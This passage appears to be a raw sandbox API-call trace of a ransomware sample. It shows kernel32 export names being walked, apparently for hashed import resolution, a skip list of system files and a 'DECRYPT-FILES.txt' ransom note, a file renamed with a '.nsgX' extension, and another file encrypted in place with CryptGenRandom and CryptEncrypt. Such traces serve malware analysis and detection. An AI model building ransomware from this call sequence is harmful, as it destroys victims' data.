(in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0083.553] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0083.553] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0083.553] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0083.553] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0083.553] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0083.553] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0083.553] lstrlenA (lpString="CTRLROUTINE") returned 11 [0083.553] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0083.553] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0083.553] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0083.553] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0083.553] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0083.553] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0083.553] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0083.553] lstrlenA (lpString="DEBUGBREAK") returned 10 [0083.553] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0083.553] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0083.553] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0083.553] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0083.553] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0083.553] lstrlenA (lpString="DECODEPOINTER") returned 13 [0083.553] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0083.553] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0083.553] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0083.553] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0083.553] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0083.553] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0083.554] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0083.554] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0083.554] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0083.554] lstrlenA (lpString="DELETEATOM") returned 10 [0083.554] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0083.554] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0083.554] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0083.554] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0083.554] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0083.554] lstrlenA (lpString="DELETEFIBER") returned 11 [0083.554] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0083.554] lstrlenA (lpString="DELETEFILEA") returned 11 [0083.554] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0083.554] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0083.554] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0083.554] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0083.554] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0083.554] lstrlenA (lpString="DELETEFILEW") returned 11 [0083.554] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0083.554] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0083.554] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0083.554] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0083.554] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0083.554] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0083.554] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0083.554] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0083.554] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0083.554] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0083.554] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0083.554] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0083.554] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0083.554] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0083.554] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0083.554] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0083.554] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0083.554] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0083.555] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0083.555] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0083.555] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0083.555] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0083.555] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0083.555] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0083.555] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0083.555] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0083.555] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0083.555] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0083.555] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0083.555] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0083.555] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0083.555] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0083.555] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0083.555] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0083.555] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0083.555] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0083.555] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0083.555] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0083.555] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0083.555] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0083.555] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0083.555] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0083.555] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0083.555] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0083.555] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0083.555] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0083.555] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0083.555] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0083.555] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0083.555] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0083.555] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0083.555] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0083.555] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0083.555] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0083.555] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0083.556] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0083.556] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0083.556] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0083.556] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0083.556] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0083.556] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0083.556] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0083.556] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0083.556] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0083.556] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0083.556] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0083.556] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0083.556] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0083.556] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Qi5 gao-vYK.ppt") returned 53 [0083.556] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Qi5 gao-vYK.ppt.nsgX") returned 58 [0083.556] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Qi5 gao-vYK.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qi5 gao-vyk.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Qi5 gao-vYK.ppt.nsgX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qi5 gao-vyk.ppt.nsgx"), dwFlags=0x0) returned 1 [0083.557] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.557] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.557] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.557] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4eaa6320, ftCreationTime.dwHighDateTime=0x1d4c6fa, ftLastAccessTime.dwLowDateTime=0x7e0f74d0, ftLastAccessTime.dwHighDateTime=0x1d4cb63, ftLastWriteTime.dwLowDateTime=0x7e0f74d0, ftLastWriteTime.dwHighDateTime=0x1d4cb63, nFileSizeHigh=0x0, nFileSizeLow=0x5f2c, dwReserved0=0x0, dwReserved1=0x0, cFileName="qtEGCKs8V-.rtf", cAlternateFileName="QTEGCK~1.RTF")) returned 1 [0083.557] lstrcmpiW (lpString1="qtEGCKs8V-.rtf", lpString2="DECRYPT-FILES.txt") returned 1 [0083.558] lstrcmpiW (lpString1="qtEGCKs8V-.rtf", lpString2="autorun.inf") returned 1 [0083.558] lstrcmpiW (lpString1="qtEGCKs8V-.rtf", lpString2="boot.ini") returned 1 [0083.558] lstrcmpiW (lpString1="qtEGCKs8V-.rtf", lpString2="desktop.ini") returned 1 [0083.558] lstrcmpiW (lpString1="qtEGCKs8V-.rtf", lpString2="ntuser.dat") returned 1 [0083.558] lstrcmpiW (lpString1="qtEGCKs8V-.rtf", lpString2="iconcache.db") returned 1 [0083.558] lstrcmpiW (lpString1="qtEGCKs8V-.rtf", lpString2="bootsect.bak") returned 1 [0083.558] lstrcmpiW (lpString1="qtEGCKs8V-.rtf", lpString2="ntuser.dat.log") returned 1 [0083.558] lstrcmpiW (lpString1="qtEGCKs8V-.rtf", lpString2="thumbs.db") returned -1 [0083.558] lstrcmpiW (lpString1="qtEGCKs8V-.rtf", lpString2="Bootfont.bin") returned 1 [0083.558] lstrlenW (lpString="qtEGCKs8V-.rtf") returned 14 [0083.558] lstrcmpiW (lpString1="rtf", lpString2="lnk") returned 1 [0083.558] lstrcmpiW (lpString1="rtf", lpString2="exe") returned 1 [0083.558] lstrcmpiW (lpString1="rtf", lpString2="sys") returned -1 [0083.558] lstrcmpiW (lpString1="rtf", lpString2="dll") returned 1 [0083.558] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0083.558] lstrlenW (lpString="qtEGCKs8V-.rtf") returned 14 [0083.558] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0083.558] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="qtEGCKs8V-.rtf" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qtEGCKs8V-.rtf") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qtEGCKs8V-.rtf" [0083.558] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0083.558] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\qtEGCKs8V-.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\qtegcks8v-.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0083.558] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=24364) returned 1 [0083.558] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0083.559] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0083.559] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0083.559] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0083.559] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.559] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0083.559] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0083.560] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.560] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0083.560] CloseHandle (hObject=0x414) returned 1 [0083.561] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.561] WriteFile (in: hFile=0x410, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0083.561] CloseHandle (hObject=0x0) returned 0 [0083.561] CloseHandle (hObject=0x410) returned 1 [0083.562] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.562] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.562] GetTickCount () returned 0x114d5b7 [0083.562] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0083.562] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0083.562] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0083.563] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0083.563] lstrlenA (lpString="kernel32.dll") returned 12 [0083.563] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0083.563] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0083.563] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0083.563] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0083.563] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0083.563] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0083.563] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0083.563] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0083.563] lstrlenA (lpString="ADDATOMA") returned 8 [0083.563] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0083.563] lstrlenA (lpString="ADDATOMW") returned 8 [0083.563] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0083.563] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0083.563] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0083.563] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0083.563] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0083.563] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0083.563] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0083.563] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0083.563] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0083.563] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0083.564] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0083.564] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0083.564] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0083.564] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0083.564] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0083.564] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0083.564] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0083.564] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0083.564] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0083.564] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0083.564] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0083.564] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0083.564] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0083.564] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0083.564] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0083.564] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0083.564] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0083.564] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0083.564] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0083.564] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0083.564] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0083.564] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0083.564] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0083.564] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0083.564] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0083.564] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0083.564] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0083.564] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0083.564] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0083.564] lstrlenA (lpString="BACKUPREAD") returned 10 [0083.564] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0083.564] lstrlenA (lpString="BACKUPSEEK") returned 10 [0083.564] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0083.564] lstrlenA (lpString="BACKUPWRITE") returned 11 [0083.564] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0083.564] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0083.565] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0083.565] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0083.565] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0083.565] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0083.565] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0083.565] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0083.565] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0083.565] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0083.565] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0083.565] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0083.565] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0083.565] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0083.565] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") 